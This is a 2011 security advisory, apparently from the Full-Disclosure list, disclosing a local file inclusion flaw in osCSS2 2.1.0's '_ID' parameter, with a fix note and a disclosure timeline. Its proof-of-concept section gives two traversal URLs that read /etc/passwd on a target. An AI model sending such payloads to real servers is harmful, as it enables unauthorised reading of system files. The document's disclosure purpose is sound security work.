Advisory: osCSS2 "_ID" parameter Local file inclusion Advisory ID: SSCHADV2011-034 Author: Stefan Schurtz Affected Software: Successfully tested on osCSS2 2.1.0 (latest version) Vendor URL: http://oscss.org/ Vendor Status: Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
========================== Vulnerability Description ========================== osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability ================== PoC-Exploit ================== http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd ========= Solution ========= Fixed in svn branche 2.1.0 and reported in develop version 2.1.1 ==================== Disclosure Timeline ==================== 08-Nov-2011 - informed vendor 08-Nov-2011 - release date of this security advisory 08-Nov-2011 - fixed by vendor 08-Nov-2011 - post on BugTraq ======== Credits ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References =========== http://oscss.org/ http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html http://dev.oscss.org/task/892 http://www.rul3z.de/advisories/SSCHADV2011-034.txt _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/